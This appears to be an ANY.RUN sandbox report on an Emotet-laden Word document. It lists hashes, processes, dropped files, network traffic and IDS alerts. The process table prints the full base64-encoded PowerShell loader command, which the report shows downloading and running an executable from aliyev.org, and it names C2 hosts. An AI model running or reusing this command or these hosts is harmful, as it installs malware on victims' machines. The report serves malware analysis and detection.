analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

90777966269660091774.doc

Full analysis: https://app.any.run/tasks/8c8aae62-7825-450b-87f0-4c7146a03070
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: March 14, 2019, 20:30:05
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
emotet
emotet-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Mar 13 20:41:00 2019, Last Saved Time/Date: Wed Mar 13 20:41:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 3, Security: 0
MD5:

A72D40F012E8DC168BD4BE7830C1A5A9

SHA1:

9E8324691C9E54D3E9479DFF9706270730875073

SHA256:

DACA06F67F177B0E7B659F8C3D954B1AB06F563F2CBDA3E1CDABABF5E02B796A

SSDEEP:

6144:277HUUUUUUUUUUUUUUUUUUUT52Vt0+Lgafdlsc+NU8N1t:277HUUUUUUUUUUUUUUUUUUUTCjkafdFg

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 269.exe (PID: 3932)
      • 269.exe (PID: 2840)
      • wabmetagen.exe (PID: 3928)
      • wabmetagen.exe (PID: 3180)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3164)
    • Emotet process was detected

      • wabmetagen.exe (PID: 3180)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3164)
      • 269.exe (PID: 3932)
    • Creates files in the user directory

      • powershell.exe (PID: 3164)
    • Application launched itself

      • 269.exe (PID: 2840)
      • wabmetagen.exe (PID: 3180)
    • Starts itself from another location

      • 269.exe (PID: 3932)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3368)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3368)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 3
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 3
Words: -
Pages: 1
ModifyDate: 2019:03:13 20:41:00
CreateDate: 2019:03:13 20:41:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: -
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
6
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 269.exe no specs 269.exe #EMOTET wabmetagen.exe no specs wabmetagen.exe

Process information

PID
CMD
Path
Indicators
Parent process
3368"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\90777966269660091774.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3164powershell -e IAAoACAAbgBlAFcALQBPAGIASgBlAEMAVAAgAEkAbwAuAEMATwBtAFAAUgBlAHMAcwBJAG8ATgAuAGQAZQBmAEwAYQBUAGUAcwB0AHIAZQBhAE0AKABbAFMAeQBzAHQARQBNAC4ASQBvAC4ATQBFAE0AbwByAHkAUwBUAHIARQBBAG0AXQBbAGMAbwBOAFYARQBSAFQAXQA6ADoARgBSAE8ATQBCAEEAUwBFADYANABzAHQAcgBJAG4AZwAoACgAJwBWAFoARgBoACcAKwAnAGEAOQBzAHcARQBJACcAKwAnAGIALwBpAGoANABZACcAKwAnAGwASgBEAEYAJwArACcAbgBqAGUAdgBzAEIAcAAnACsAJwBEACcAKwAnAHoAegBIADEAdwBxAEIAJwArACcAZwBVACcAKwAnAHQATwAnACsAJwBzAEQASQBJACcAKwAnAHMAbgAyAE4ATgBpAHUAWAAnACsAJwBaAFMAJwArACcAcgBRACcAKwAnAFEAOAB0ACcAKwAnACsAbgByACcAKwAnAGcAJwArACcAMQBaADkAZQAzAEUAYwArACsAOQAnACsAJwA5ACcAKwAnADUANgAzAHMAcwA5AFoAJwArACcAVQBTAFIAJwArACcAMABCAFEAVgAnACsAJwBBAHEAbQBuAHMAZgBWADkARAAnACsAJwBYAG8ASgBNAE8AcgBSAHoAWABmADEAQwAnACsAJwBiAHMAJwArACcAZwBEAEcAdgA4AEoAcQAnACsAJwA0AFUAUwAyAEoAJwArACcAbgAnACsAJwBZADIAMgAnACsAJwAzAEMAJwArACcAQQByAEsARQB0AHMAYgAwADQAMgAwAFEAVwBHAHQAOQAwADIAJwArACcASwAnACsAJwBsAEcAJwArACcASgBlAGMAMQBhAFAAWgAxADAATAA3AFgATwA4AEMAJwArACcAMgA4ADkARgB4ADkAVwArAHgAagAnACsAJwBIADQAJwArACcALwBCACcAKwAnAGoAYwAnACsAJwB2AFgAUwA0AEIAcQBiACcAKwAnAEUARQAnACsAJwBRACsAJwArACcAKwAnACsAJwBIAHIAYQAnACsAJwBCAHEAaAB0AFoAJwArACcAagBmACcAKwAnAGcAbABrAG8ARgBlADMANwB3AFMALwB6AFQAYgBJAC8AYQAnACsAJwBDAGoANgAzAHUATAAwAHEAcwAzAG8AawB1AEMAJwArACcASAA5ACcAKwAnAGsALwAxAEYAdQBzAGwAVgB1AGgAcwAnACsAJwBGAEIANgBHACcAKwAnAEYAMAAnACsAJwBxACcAKwAnAEwAKwBYACcAKwAnAFYAJwArACcAMQBoAHoAZgBvAFYAZgBLAGUAYQBZAGQANwA1AFkAVgAnACsAJwBBAGYAVQBYAC8AVgBLAG0AQQBtADkAbwA5AFAAWQBrADQAJwArACcAdAAxADkASgBMAEoAJwArACcAWQAxACcAKwAnAHEANgBQAGEAJwArACcAWABMAHAATQBuAFQAJwArACcAOAAnACsAJwBCACcAKwAnAGwASQBRAHUAaQAnACsAJwBuACcAKwAnAG0ANgArAHUAJwArACcAdgByAGUAaABCACcAKwAnAFYAaQBBAHkAMABBAEMAYgBHAHcAUgB1AGsALwBnACcAKwAnAFUATwBSAHIAUwAnACsAJwBEAHoAcwAnACsAJwBEAHIAJwArACcAZgAnACsAJwA3AEUAWQBkACsAMABJADEAUQAnACsAJwBPACcAKwAnAEsATQAvADYAZQB4AE4AWQBrAFoAOQAvAEkATQAnACsAJwAwAGIAdgAnACsAJwBTAEEAagAnACsAJwBMAGMAJwArACcAVABUACcAKwAnADUAJwArACcAUgBaAGwAZwBFAFIASABYAG0ATAAnACsAJwBkAFgAbwB5AHcALwBGADAAdQBZAEsAZgBhAGQAcwBwACcAKwAnAHoAZQBwADcASgAnACsAJwAzAFMAaABQACcAKwAnADUARABMAEwARwBmACcAKwAnADIAZAA1ACcAKwAnADYAJwArACcAbgBaAFMANABUACcAKwAnACsAaQAzAFgAawBJAEsANwA0AEwAJwArACcASQBoAGsAMABtAE8AJwArACcAWgAnACsAJwByADQAJwArACcAMAB1AEwAJwArACcAdQBpAHYAcwBKAHUAYQAxACcAKwAnAG8AeQAzACcAKwAnAHkASwBKAFAAcgBvADMASgBhAGQAbABkADkAQQBTACcAKwAnADMANAAnACsAJwBPACcAKwAnAHgAeAA0AHIAJwArACcAYwBSAG8AcwAnACsAJwAwACcAKwAnAG8AWABXAFcAJwArACcAQQAyAFEAMAByAHAAeABaAEcAWgAnACsAJwAvAFAAJwArACcAbgBCAG4AZQBuACcAKwAnAHMAJwArACcANQBuADcAJwArACcANgBtAEEAJwArACcAdAAnACsAJwBIAEQAJwArACcAYgA5ADIAJwArACcAcwBvAE4AVQAnACsAJwBRAGIARwAnACsAJwB2ACcAKwAnADgAJwArACcARgAnACkAKQAgACwAWwBJAE8ALgBDAG8AbQBQAFIARQBzAFMASQBPAG4ALgBjAG8AbQBwAFIAZQBTAFMAaQBPAE4ATQBvAGQARQBdADoAOgBkAGUAYwBPAG0AcAByAGUAUwBTACkAIAB8ACAAZgBvAHIARQBhAEMAaAAgAHsAbgBlAFcALQBPAGIASgBlAEMAVAAgACAAcwBZAHMAVABlAE0ALgBJAE8ALgBzAHQAUgBFAEEATQByAGUAYQBkAEUAcgAoACAAJABfACwAIABbAFMAWQBTAHQARQBNAC4AVABlAHgAVAAuAGUAbgBDAG8ARABJAE4ARwBdADoAOgBBAFMAYwBpAGkAKQAgAH0AKQAuAHIARQBhAEQAdABPAGUATgBEACgAKQAgAHwALgAoACAAJABlAE4AVgA6AEMAbwBNAFMAUABFAEMAWwA0ACwAMgA0ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2840"C:\Users\admin\269.exe" C:\Users\admin\269.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Sticky Notes
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3932"C:\Users\admin\269.exe"C:\Users\admin\269.exe
269.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Sticky Notes
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3180"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
269.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Sticky Notes
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3928"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
wabmetagen.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Sticky Notes
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 684
Read events
1 271
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
3368WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRDDFD.tmp.cvr
MD5:
SHA256:
3164powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IGQO1WZGRTXE8F6ZJZ0P.temp
MD5:
SHA256:
3164powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1ae81f.TMPbinary
MD5:0586DB8FF5249AD980CEC7BF2CBC3708
SHA256:DF93E043BDFAB9E6C36B353985E621A7A276756B52877AACDC5F36517009B4E2
3368WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:6FD18234DDBB23A0012311444A9FABA1
SHA256:695AB9750FFBDA0E108233C4275FF6CDF75DC10F78871B1FC329972A0F7C120F
3164powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:0586DB8FF5249AD980CEC7BF2CBC3708
SHA256:DF93E043BDFAB9E6C36B353985E621A7A276756B52877AACDC5F36517009B4E2
3932269.exeC:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exeexecutable
MD5:581C1005B51E13FEF1FE9469003B6AF6
SHA256:0712E45E63AD4CEF8CAC789DA5414682B6945E891811B3976E38FDBD919A52CB
3164powershell.exeC:\Users\admin\269.exeexecutable
MD5:581C1005B51E13FEF1FE9469003B6AF6
SHA256:0712E45E63AD4CEF8CAC789DA5414682B6945E891811B3976E38FDBD919A52CB
3368WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$777966269660091774.docpgc
MD5:9A751F04335836F4605CF1310F67E2DC
SHA256:2B339BA5A7954B6F41A9EEAD0311090F73773C835243B143547A1E9027560866
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
4
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3928
wabmetagen.exe
GET
187.233.152.78:443
http://187.233.152.78:443/
MX
malicious
3164
powershell.exe
GET
200
193.70.124.5:80
http://aliyev.org/ldfkbse54k/oX6/
FR
executable
360 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3928
wabmetagen.exe
187.233.152.78:443
Uninet S.A. de C.V.
MX
malicious
3164
powershell.exe
193.70.124.5:80
aliyev.org
OVH SAS
FR
suspicious
3164
powershell.exe
5.9.78.37:443
www.theblackcadstudio.com
Hetzner Online GmbH
DE
unknown

DNS requests

Domain
IP
Reputation
www.theblackcadstudio.com
  • 5.9.78.37
malicious
aliyev.org
  • 193.70.124.5
suspicious

Threats

PID
Process
Class
Message
3164
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3164
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3164
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3164
powershell.exe
Misc activity
ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)
No debug info